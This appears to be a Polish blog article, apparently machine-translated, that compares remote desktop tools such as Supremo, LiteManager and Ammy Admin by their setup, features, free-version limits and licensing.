Oczywiście TeamViewer ma również ustawienia upraszczające system haseł itp., Ale w tym programie wszystko jest uproszczone do nikąd.

Możesz pobrać narzędzie za darmo poprzez bezpośredni link z oficjalnej strony programisty. Rozmiar pliku to 2-3 MB.

Algorytm Supremo (podobny do TeamViewer)

Zdalne zarządzanie innym komputerem wymaga programu na obu urządzeniach.

  • Uruchom narzędzie i kliknij instalator, potwierdź umowę z wymaganiami licencji.
  • Następnym krokiem jest kliknięcie „Start” na komputerze, do którego uzyskujesz dostęp.
  • Otrzymasz tajny kod i identyfikator, a następnie udostępnisz je podobnie myślącemu użytkownikowi.
  • Twój „przyjaciel” musi wprowadzić dane otrzymane od Ciebie w linii o nazwie „Partner ID” i połączyć się.
  • Następnie musi wprowadzić hasło, w tym samym czasie zobaczysz okno z prośbą o potwierdzenie operacji (automatycznie zniknie po dziesięciu sekundach). Następnie znajomy otrzymuje pełny dostęp do komputera, zarówno pod względem wizualnym, jak i technicznym.

Teraz będzie mógł wykonywać w Twoim imieniu różne konfiguracje: instalowanie i usuwanie oprogramowania, czyszczenie rejestru, przeglądanie plików osobistych itp. Przed nim pojawi się ukryte okno z monitorem, które może kliknąć, aby je rozwinąć. Zalecam wyłączenie wszystkich efektów wizualnych (Aero, tapety itp.), Ponieważ prędkość transferu między komputerami znacznie się pogorszy. W celu korespondencji można włączyć czat; w celu przesyłania plików można uruchomić menedżera plików.

Dość wygodne i praktyczne w użyciu narzędzie, które składa się z kilku podcastów. Pierwsza część to Serwer, od razu ją instalujemy i uruchamiamy na innym komputerze, druga to Viewer, który pozwala nam kierować innym komputerem. Narzędzie wymaga nieco większej świadomości niż inne programy. Praca z serwerem nie jest tak trudna, możesz sam ustawić identyfikator użytkownika, program zapamiętuje dane i nie wymaga już ponownego wprowadzania i potwierdzania informacji. Darmowa wersja do użytku osobistego - LiteManager Free.

Oprócz zdalnej regulacji, czatu, eksportu danych i czyszczenia rejestru, istnieje kilka interesujących funkcji: przechwytywanie monitora, inwentaryzacja, zdalne usuwanie. Bezpłatne korzystanie jest dostępne do pracy na trzydziestu komputerach, wszelkie ograniczenia w ramach czasowych programu są wykluczone, istnieje funkcja konfiguracjiID  do wspólnego użytku. Darmowy i do użytku biznesowego.

Praktycznie nie ma żadnych niedociągnięć, ale pewne niedogodności w darmowej wersji powodują zmniejszenie możliwości podczas pracy na więcej niż trzydziestu komputerach. Ogólnie rzecz biorąc, program jest dość wygodny i skuteczny do administracji i zdalnego zarządzania.

Ammy admin

Narzędzie jest również identyczne jak TeamViewer, ale znacznie łatwiej jest z nim pracować. Główne funkcje to: Czat, przesyłanie plików, przeglądanie zdalnego komputera i zarządzanie nim. Łatwość użytkowania nie wymaga poważnej świadomości; można go używać w sieci LAN i Internecie.

Wady mogą wydawać się ograniczonym czasem pracy, płaconym za działalność przedsiębiorczą. Prezentowane narzędzie prawdopodobnie lepiej nie używać do poważnych manipulacji.

Jeden z oryginalnych płatnych programów do zdalnej manipulacji komputerami innych firm, zaprojektowany z myślą o administracji operacyjnej i wykonany z naciskiem na bezpieczeństwo. Narzędzie składa się z dwóch części: serwera i klienta. Głównym celem programu jest praca z adresem IP, konieczna jest instalacja. Bez specjalnych umiejętności trudno będzie zrozumieć wszystkie funkcje, więc nie jest odpowiedni dla nowych użytkowników.

Zgodnie z oczekiwaniami program działa z dużą prędkością dzięki sterownikowi graficznemu, praktycznie nie ma opóźnień i zawiesza się. Wbudowana technika Intel AMT umożliwia dostęp do systemu BIOS komputera innej osoby i wykonywanie różnych operacji za jego pomocą. Program nie ma funkcji awaryjnych, z wyjątkiem niezawodności i bezpieczeństwa. Główne tryby są wbudowane: czat, eksport plików, zdalne sterowanie.

Istnieje kilka wad: brak klienta mobilnego i praca bez adresu IP, darmowa wersja jest dostępna tylko przez miesiąc, ograniczenia graficzne wyłączają personalizację (monitor może zgasnąć), wymagane jest doświadczenie do pracy z narzędziem.

Możemy zatem stwierdzić, że doświadczeni użytkownicy powinni używać tego programu do administrowania komputerem w trybie LAN. Aby pracować w Internecie, najprawdopodobniej musisz przeprowadzić tunel VPN.

Zasadniczo można zauważyć co najmniej 5 innych programów, ale nie ma to sensu: wszystkie niezbędne funkcje są wykonywane przez powyższe narzędzia. Funkcjonalność tych programów nie różni się bardzo. Niektóre są całkowicie darmowe, ale mają swoje wady, inne mają więcej funkcji, ale trzeba zapłacić. Niektóre mają dodatkowo licencję na rok, więc w przypadku długotrwałego użytkowania będą musieli wystartować w celu przedłużenia licencji. Więc powinieneś wybrać na podstawie swojego celu. Te programy są całkiem odpowiednie do użytku niekomercyjnego. Możesz nawet połączyć kilka naraz.


DZWONEK

Są tacy, którzy czytają te wiadomości przed tobą.
Subskrybuj, aby otrzymywać świeże artykuły.
E-mail
Imię
Nazwisko
Jak chcesz przeczytać Dzwon
Bez spamu